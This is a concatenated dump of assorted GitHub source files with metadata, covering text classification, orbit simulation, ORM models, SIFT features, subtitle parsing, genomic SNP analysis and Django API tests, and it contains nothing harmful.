\"\"\"\n classifier: trained classifier\n tag: particular tag\n tags_classes: a list of classes names from MultiLabelBinarizer\n index_to_words: index_to_words transformation\n all_words: all words in the dictionary\n\n return nothing, just print top 5 positive and top 5 negative words for current tag\n \"\"\"\n print('Tag:\\t{}'.format(tag))\n\n # Extract an estimator from the classifier for the given tag.\n index_of_tag = tags_classes.index(tag)\n estimators_of_tag = classifier_tfidf.coef_[index_of_tag]\n # Extract feature coefficients from the estimator.\n ind_of_estimators = np.argsort([estimators_of_tag])\n # Extract feature coefficients from the estimator.\n\n # top_positive_coefs = estimators_of_tag[ind_of_estimators][:,-5:]# top-5 words sorted by the coefficiens.\n # top_negative_coefs = estimators_of_tag[ind_of_estimators][0,:5]\n\n top_positive_words = [tfidf_reversed_vocab.get(key) for key in ind_of_estimators[:,-5:].tolist()[0]][::-1]\n top_negative_words = [tfidf_reversed_vocab.get(key) for key in ind_of_estimators[0,:5].tolist()]\n\n # bottom-5 words sorted by the coefficients.\n print('Top positive words:\\t{}'.format(', '.join(top_positive_words)))\n print('Top negative words:\\t{}\\n'.format(', '.join(top_negative_words)))\n\n\nprint_words_for_tag(classifier_tfidf, 'c', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)\nprint_words_for_tag(classifier_tfidf, 'c++', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)\nprint_words_for_tag(classifier_tfidf, 'linux', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)", "repo_name": "tsantosh7/NLP_multilabel_classification_hse-aml", "sub_path": "multilabel_classification.py", "file_name": "multilabel_classification.py", "file_ext": "py", "file_size_in_byte": 10176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nltk.download", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 23, "usage_type": "argument"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 35, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 37, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 37, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 64, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 116, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 116, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 116, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 117, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 118, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 118, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MultiLabelBinarizer", "line_number": 155, "usage_type": "call"}, {"api_name": "sklearn.multiclass.OneVsRestClassifier", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 249, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 251, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 282, "usage_type": "call"}]}
+{"seq_id": "17313090841", "text": "'''\ndate: 08/01/22\nexercise: 8.13\n\ndesc: solving and visualizing earth's and pluto's orbits about the sun \nusing the bulirsch-stoer method with combined modified midpoint/richardson extrapolation \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import sqrt\n\nG,M = 6.6738e-11*(3600*24*7*52)**2, 1.9891e30\nN = 52 \ndelta = 1.0*10e3\n\ndw = lambda r: -G*M*r[0]/sqrt(r[0]**2 + r[1]**2)**3\ndz = lambda r: -G*M*r[1]/sqrt(r[0]**2 + r[1]**2)**3\nf = lambda r: np.array( [r[2],r[3],dw(r),dz(r)] ) \n\n\ndef bs():\n for t in range(N-1):\n\n n = 1\n r1 = r[:,t] + 0.5*H*f(r[:,t])\n r2 = r[:,t] + H*f(r1)\n R1 = np.empty((4,1),float)\n R1[:,0] = 0.5*(r1+r2+0.5*H*f(r2))\n error = 2*H*delta\n while error>H*delta:\n n = n + 1\n h = H/n\n \n r1 = r[:,t] + 0.5*h*f(r[:,t])\n r2 = r[:,t] + h*f(r1)\n for i in range(n-1):\n r1 += h*f(r2)\n r2 += h*f(r1)\n\n R2 = R1[:,:]\n R1 = np.empty((4,n),float)\n R1[:,0] = 0.5*(r1+r2+0.5*h*f(r2))\n for m in range(1,n):\n ep = (R1[:,m-1]-R2[:,m-1])/((n/(n-1))**(2*m)-1)\n R1[:,m] = R1[:,m-1] + ep\n error = abs(np.linalg.norm(ep[0:1]))\n #print(error)\n r[:,t+1] = R1[:,n-1]\n return r\n\nr = np.empty((4,N),float)\nt0,tf = 0.0,1.1 # earth times\nH = (tf-t0)/N\nt_points = np.arange(t0,tf,H)\nr[:,0] = [1.471e11,0,0,3.0287e4*(3600*24*7*52)] # earth initial conditions\nearth_r = bs()\n\nt0,tf = 0.0,260 # pluto times\nH = (tf-t0)/N\nt_points = np.arange(t0,tf,H)\nr = np.empty((4,N),float)\nr[:,0] = [4.4368e12,0,0,6.1218e3*(3600*24*7*52)] # pluto initial conditions \npluto_r = bs()\n\nfig,ax = plt.subplots(1)\nax.plot(earth_r[0,:],earth_r[1,:],c='blue')\nax.plot(pluto_r[0,:],pluto_r[1,:],c='orange')\nax.set(xlabel='x distance from sun',ylabel='y distance from sun',title=\"earth and pluto's orbit about the sun\")\nplt.show()", "repo_name": "jonathanhouse/selected-physics-projects", "sub_path": "visualizations/bs_method_orbit/ex813.py", "file_name": "ex813.py", "file_ext": "py", "file_size_in_byte": 1967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.sqrt", "line_number": 17, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "5671664008", "text": "from datetime import datetime, timedelta\nimport math,random\nfrom flask_login import UserMixin\nfrom spotswap import db\n\n\nclass Availability(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n parking_id = db.Column(db.Integer, db.ForeignKey('parkings.id'), nullable=False)\n date = db.Column(db.Date, nullable=False)\n start_time = db.Column(db.Time, nullable=False)\n end_time = db.Column(db.Time, nullable=False)\n is_available = db.Column(db.Boolean, default=True, nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n updated_at = db.Column(db.DateTime, onupdate=datetime.utcnow)\n\n def __str__(self):\n return 'Availability: {}'.format(self.id)\n", "repo_name": "AarinSalot/SpotSwap", "sub_path": "backend/spotswap/models/Availability.py", "file_name": "Availability.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "spotswap.db.Model", "line_number": 7, "usage_type": "attribute"}, {"api_name": "spotswap.db", "line_number": 7, "usage_type": "name"}, {"api_name": "spotswap.db.Column", "line_number": 8, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 8, "usage_type": "name"}, {"api_name": "spotswap.db.Integer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 9, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 9, "usage_type": "name"}, {"api_name": "spotswap.db.Integer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "spotswap.db.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "spotswap.db.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 10, "usage_type": "name"}, {"api_name": "spotswap.db.Date", "line_number": 10, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 11, "usage_type": "name"}, {"api_name": "spotswap.db.Time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 12, "usage_type": "name"}, {"api_name": "spotswap.db.Time", "line_number": 12, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 13, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 13, "usage_type": "name"}, {"api_name": "spotswap.db.Boolean", "line_number": 13, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 14, "usage_type": "name"}, {"api_name": "spotswap.db.DateTime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "spotswap.db.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 15, "usage_type": "name"}, {"api_name": "spotswap.db.DateTime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "73743978008", "text": "import sys\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom .base_model import BaseModel\n\nsys.path.append('..')\n\nfrom utils.opencvhelper import SiftWrapper\n\n\nclass RootsiftModel(BaseModel):\n default_config = {'n_feature': 0, \"n_sample\": 0,\n 'batch_size': 512, 'sift_wrapper': None, 'upright': False, 'scale_diff': False,\n 'dense_desc': False, 'sift_desc': False, 'peak_thld': 0.0067, 'max_dim': 1280}\n\n def _init_model(self):\n self.sift_wrapper = SiftWrapper(\n n_feature=self.config['n_feature'],\n n_sample=self.config['n_sample'],\n peak_thld=self.config['peak_thld'])\n self.sift_wrapper.standardize = False # the network has handled this step.\n self.sift_wrapper.ori_off = self.config['upright']\n self.sift_wrapper.pyr_off = not self.config['scale_diff']\n self.sift_wrapper.create()\n\n def _run(self, data):\n assert data.shape[-1] == 1\n gray_img = np.squeeze(data, axis=-1).astype(np.uint8)\n # detect SIFT keypoints.\n npy_kpts, cv_kpts = self.sift_wrapper.detect(gray_img)\n sift_desc = self.sift_wrapper.compute(gray_img, cv_kpts)\n return npy_kpts, sift_desc\n\n def _construct_network(self):\n \"\"\"Model for patch description.\"\"\"\n return", "repo_name": "lzx551402/contextdesc", "sub_path": "models/rootsift_model.py", "file_name": "rootsift_model.py", "file_ext": "py", "file_size_in_byte": 1314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 224, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "base_model.BaseModel", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.opencvhelper.SiftWrapper", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "36137584497", "text": "import xml.etree.ElementTree as ET\r\n\r\n\r\ndef parse_time(str_ms):\r\n total_ms = int(str_ms)\r\n ms = total_ms % 1000\r\n total_s = int(total_ms / 1000)\r\n s = total_s % 60\r\n total_m = int(total_s / 60)\r\n m = total_m % 60\r\n h = int(total_m / 60)\r\n\r\n # print(str_ms, ' to:', h, m, s, ms)\r\n return total_ms, h, m, s, ms\r\n\r\n\r\ndef parse_end_time(str_ms_start, str_ms_duration):\r\n return parse_time(int(str_ms_start) + int(str_ms_duration))\r\n\r\n\r\nclass VttLine:\r\n def __init__(self, start, stop, text):\r\n self.start = start\r\n self.end = stop\r\n self.text = text.strip()\r\n\r\n def __str__(self):\r\n return '%s %s %s' % (self.start, self.end, self.text)\r\n\r\n\r\ndef parse_subtitle_xml(filename):\r\n tree = ET.parse(filename)\r\n root = tree.getroot()\r\n\r\n count = 0\r\n # last_start_ms = 0\r\n last_end_time = [-1, 0, 0, 0, 0]\r\n all_lines = []\r\n for p in root.findall('body/p'):\r\n # skip 0 duration\r\n if 'd' not in p.attrib:\r\n continue\r\n\r\n text = ''\r\n for s in p.findall('s'):\r\n text += s.text\r\n\r\n # skip empty sentences\r\n text = text.strip()\r\n if len(text) == 0 or text == '[Music]':\r\n continue\r\n\r\n # parse timing\r\n start_time = parse_time(p.attrib['t'])\r\n end_time = parse_end_time(p.attrib['t'], p.attrib['d'])\r\n\r\n # print(start_time, end_time, text)\r\n # update last record if it's part of previous sentence\r\n if start_time[0] <= last_end_time[0]:\r\n all_lines[-1]['end_time'] = start_time\r\n\r\n # record another session with empty subtitle if span > 10ms, for segmenting\r\n if start_time[0] - last_end_time[0] > 10:\r\n all_lines.append({'line_id': count, 'start_time': last_end_time, 'end_time': start_time, 'text': ''})\r\n count += 1\r\n\r\n all_lines.append({'line_id': count, 'start_time': start_time, 'end_time': end_time, 'text': text})\r\n\r\n # last_start_ms = start_time[0]\r\n last_end_time = end_time\r\n\r\n # add line id\r\n count += 1\r\n\r\n output = []\r\n for line in all_lines:\r\n # output.append('%02d:%02d:%02d.%03d %02d:%02d:%02d.%03d %s\\n' %\r\n # (line['start_time'][1], line['start_time'][2], line['start_time'][3], line['start_time'][4],\r\n # line['end_time'][1], line['end_time'][2], line['end_time'][3], line['end_time'][4],\r\n # line['text']))\r\n\r\n start_time_str = '%02d:%02d:%02d.%03d' % (line['start_time'][1], line['start_time'][2], line['start_time'][3], line['start_time'][4])\r\n stop_time_str = '%02d:%02d:%02d.%03d' % (line['end_time'][1], line['end_time'][2], line['end_time'][3], line['end_time'][4])\r\n output.append(VttLine(start_time_str, stop_time_str, line['text']))\r\n\r\n return output\r\n\r\nif __name__ == '__main__':\r\n lines = parse_subtitle_xml('./Subtitles/EP1.pretty.xml')\r\n\r\n out_file = './EP1.vtt.txt'\r\n f = open(out_file, 'w+')\r\n for line in lines:\r\n f.write(str(line))\r\n f.write('\\n')\r\n f.close()\r\n", "repo_name": "Xiaoxuan-Zhang/Videogame_Moment_Textual_Search", "sub_path": "subtitlexmlparser.py", "file_name": "subtitlexmlparser.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 32, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "13476540126", "text": "# __author__ = 'veronika'\n\nimport pickle\nimport vcf\nfrom Bio.SeqRecord import SeqRecord\n\nfrom django.db import models\nfrom sequencing.analysis.snps.parse_snps import retrieve_explicit_snps_positions, snp_is_ms\nfrom targeted_enrichment.amplicons.models import Amplicon, AmpliconCollection, PlainTargetedAmplicon\nfrom sequencing.analysis.models_common import SampleReads, _read_bam, post_delete_files, BWAIndexMixin\n\n\ndef is_snp(r, min_cover=5):\n if r.INFO['DP'] < min_cover or len(r.REF) != 1:\n return False\n # if len(r.ALT) == 1:\n # return False\n return True\n\n\ndef _parse_vcf_file(vcf_file, min_cover=5):\n cell_snps = {}\n chrom = None\n is_ms = False\n snp_rel_pos = []\n\n vcf_reader = vcf.Reader(open(vcf_file, 'r'))\n for r in vcf_reader:\n if is_snp(r, min_cover):\n if chrom != r.CHROM:\n chrom = r.CHROM\n snp_rel_pos = list(retrieve_explicit_snps_positions(r))\n is_ms = snp_is_ms(r)\n if is_ms:\n continue\n smp_mod = r.ALT\n if len(r.ALT) == 1:\n smp_mod = SeqRecord('X')\n cell_snps.setdefault((r.CHROM, str(r.POS)), {'base': r.REF,\n 'modification': smp_mod,\n 'DP': r.INFO['DP'],\n 'stats': r.INFO['QS'],\n 'SNP_defined': False})\n\n for snp_rel in snp_rel_pos:\n if r.POS == snp_rel:\n cell_snps[(r.CHROM, str(r.POS))]['SNP_defined'] = True\n # Note that vcf is 1-based, so we should have abs_pos-amplicon_start+1 as rel_pos.\n # However, because bedtools is 0-based, our amplicons are without the first base,\n # so vcf indices become 0-based in the original amplicon, and rel_pos = abs_pos-amplicon_start.\n return cell_snps\n\n\ndef _extract_snp_file(snp_file):\n with open(snp_file, 'rb') as handle:\n snp_dict = pickle.load(handle)\n return snp_dict\n\n\nclass AmpliconCollectionBWAIndex(BWAIndexMixin):\n amplicon_collection = models.ForeignKey(AmpliconCollection, unique=True)\n\n def __str__(self):\n return \"{}\".format(self.amplicon_collection)\n\npost_delete_files(AmpliconCollectionBWAIndex)\n\n\nclass ReadsAlignment(models.Model):\n sample_read = models.ForeignKey(SampleReads)\n alignment_reference = models.ForeignKey(AmpliconCollectionBWAIndex)\n bam_file = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def parse_bam_file(self):\n for ms_genotypes_name, read_id in _read_bam(self.bam_file):\n yield read_id, ms_genotypes_name\n\n @property\n def files(self):\n yield self.bam_file\n\n def __str__(self):\n return \"{}@{}\".format(self.sample_read, self.alignment_reference)\n\n class Meta:\n unique_together = (\n (\"sample_read\", \"alignment_reference\"),\n )\npost_delete_files(ReadsAlignment)\n\n\nclass VCFReads(models.Model):\n reads_alignment = models.ForeignKey(ReadsAlignment, unique=True)\n vcf_file = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def parse_vcf_file(self):\n rows = _parse_vcf_file(self.vcf_file)\n return rows\n\n @property\n def files(self):\n yield self.vcf_file\n\n def __str__(self):\n return \"{}@{}\".format(self.reads_alignment, self.vcf_file)\n\npost_delete_files(VCFReads)\n\n\nclass SNPReads(models.Model):\n vcf_read = models.ForeignKey(VCFReads)\n min_cover = models.IntegerField()\n snps_dict = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def extract_snp_file(self):\n snp_dict = _extract_snp_file(self.snps_dict)\n return snp_dict\n\n @property\n def files(self):\n yield self.snps_dict\n\n def __str__(self):\n return \"{}@{}\".format(self.vcf_read, self.snps_dict)\n\n class Meta:\n unique_together = (\n (\"vcf_read\", \"min_cover\"),\n )\npost_delete_files(SNPReads)\n", "repo_name": "shapirolab/clineage", "sub_path": "sequencing/analysis/snps/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4167, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "31", "api": [{"api_name": "vcf.Reader", "line_number": 27, "usage_type": "call"}, {"api_name": "sequencing.analysis.snps.parse_snps.retrieve_explicit_snps_positions", "line_number": 32, "usage_type": "call"}, {"api_name": "sequencing.analysis.snps.parse_snps.snp_is_ms", "line_number": 33, "usage_type": "call"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 56, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.BWAIndexMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 61, "usage_type": "call"}, {"api_name": "targeted_enrichment.amplicons.models.AmpliconCollection", "line_number": 61, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 66, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 70, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.SampleReads", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 72, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 72, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common._read_bam", "line_number": 75, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 93, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 93, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 94, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 94, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 107, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 111, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 111, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 112, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "37027188929", "text": "import random\n\nimport pytest\nfrom django.shortcuts import reverse\nfrom django.utils import timezone\nfrom mimesis import Address, Datetime, Numbers\nfrom mimesis.random import Random\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom flights.platform import models\n\n\n@pytest.fixture\ndef headers(user):\n refresh = RefreshToken.for_user(user)\n return {\"HTTP_AUTHORIZATION\": f\"Bearer {refresh.access_token}\"}\n\n\n@pytest.fixture\ndef flight():\n return models.Flight.objects.create(\n name=\"Flight Name\",\n number=\"FL 1235\",\n scheduled_at=timezone.now(),\n expected_at=timezone.now(),\n departure=\"Stockholm\",\n destination=\"London\",\n duration=90,\n fare=345,\n )\n\n\n@pytest.fixture\ndef flights():\n return [\n models.Flight.objects.create(\n name=f\"Flight_{i}\",\n number=Random().custom_code(mask=\"@@ ####\"),\n departure=Address().city(),\n destination=Address().city(),\n scheduled_at=Datetime().datetime(),\n expected_at=Datetime().datetime(),\n duration=Numbers().integer_number(start=1, end=100),\n fare=Numbers().float_number(start=1, end=10000, precision=2),\n )\n for i in range(10)\n ]\n\n\ndef test_get_flights_unauth(client):\n resp = client.get(reverse(\"flight-list\"))\n assert resp.status_code == 401\n\n\ndef test_get_flights_empty(client, headers):\n resp = client.get(\n reverse(\"flight-list\"), content_type=\"application/json\", **headers\n )\n\n payload = resp.json()\n assert payload[\"results\"] == []\n\n\ndef test_get_flights_ok(client, headers, flight):\n resp = client.get(\n reverse(\"flight-list\"), content_type=\"application/json\", **headers\n )\n\n payload = resp.json()\n assert payload[\"results\"][0][\"name\"] == flight.name\n assert payload[\"results\"][0][\"number\"] == flight.number\n\n\ndef test_create_flight(client, headers):\n flight_name = \"Flight1\"\n data = {\n \"name\": flight_name,\n \"number\": \"Flight Number\",\n \"departure\": \"Stockholm\",\n \"destination\": \"London\",\n \"scheduled_at\": timezone.now(),\n \"expected_at\": timezone.now(),\n \"fare\": 112,\n \"duration\": 90,\n }\n resp = client.post(\n reverse(\"flight-list\"),\n data=data,\n content_type=\"application/json\",\n **headers,\n )\n\n payload = resp.json()\n created_flight = models.Flight.objects.get(name=flight_name)\n assert payload[\"id\"] == created_flight.id\n\n\ndef test_partial_update_flight(client, headers, flight):\n data = {\n \"departure\": \"Paris\",\n }\n resp = client.patch(\n reverse(\"flight-detail\", args=[flight.id]),\n data=data,\n content_type=\"application/json\",\n **headers,\n )\n\n payload = resp.json()\n updated_flight = models.Flight.objects.get(id=flight.id)\n assert payload[\"departure\"] == updated_flight.departure\n\n\ndef test_delete_flight(client, headers, flight):\n resp = client.delete(\n reverse(\"flight-detail\", args=[flight.id]),\n content_type=\"application/json\",\n **headers,\n )\n\n assert resp.status_code == 204\n assert not models.Flight.objects.filter(id=flight.id).exists()\n\n\ndef test_search_flight_by_name(client, headers, flights):\n some_flight = random.choice(flights)\n resp = client.get(\n reverse(\"flight-list\"),\n data={\"name\": some_flight.name},\n **headers,\n )\n\n assert resp.status_code == 200\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 1\n assert payload[\"results\"][0][\"number\"] == some_flight.number\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures(\"flights\")\ndef test_search_specific_flight(client, headers, flight):\n assert models.Flight.objects.count() == 11\n\n resp = client.get(\n reverse(\"flight-list\"),\n data={\n \"scheduled_at\": flight.scheduled_at,\n \"departure\": flight.departure,\n \"destination\": flight.destination,\n },\n **headers,\n )\n\n assert resp.status_code == 200\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 1\n assert payload[\"results\"][0][\"departure\"] == flight.departure\n\n\ndef test_search_flight_pagination(client, headers, flights):\n assert models.Flight.objects.count() == 10\n\n resp = client.get(reverse(\"flight-list\"), data={\"limit\": 5}, **headers)\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 5\n assert resp.status_code == 200\n", "repo_name": "pavel-fokin/flights", "sub_path": "tests/test_flights_api.py", "file_name": "test_flights_api.py", "file_ext": "py", "file_size_in_byte": 4493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework_simplejwt.tokens.RefreshToken.for_user", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.tokens.RefreshToken", "line_number": 15, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 25, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.create", "line_number": 36, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 36, "usage_type": "name"}, {"api_name": "mimesis.random.Random", "line_number": 38, "usage_type": "call"}, {"api_name": "mimesis.Address", "line_number": 39, "usage_type": "call"}, {"api_name": "mimesis.Address", "line_number": 40, "usage_type": "call"}, {"api_name": "mimesis.Datetime", "line_number": 41, "usage_type": "call"}, {"api_name": "mimesis.Datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "mimesis.Numbers", "line_number": 43, "usage_type": "call"}, {"api_name": "mimesis.Numbers", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.shortcuts.reverse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 66, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 81, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 81, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 82, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.get", "line_number": 94, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 103, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 116, "usage_type": "call"}, 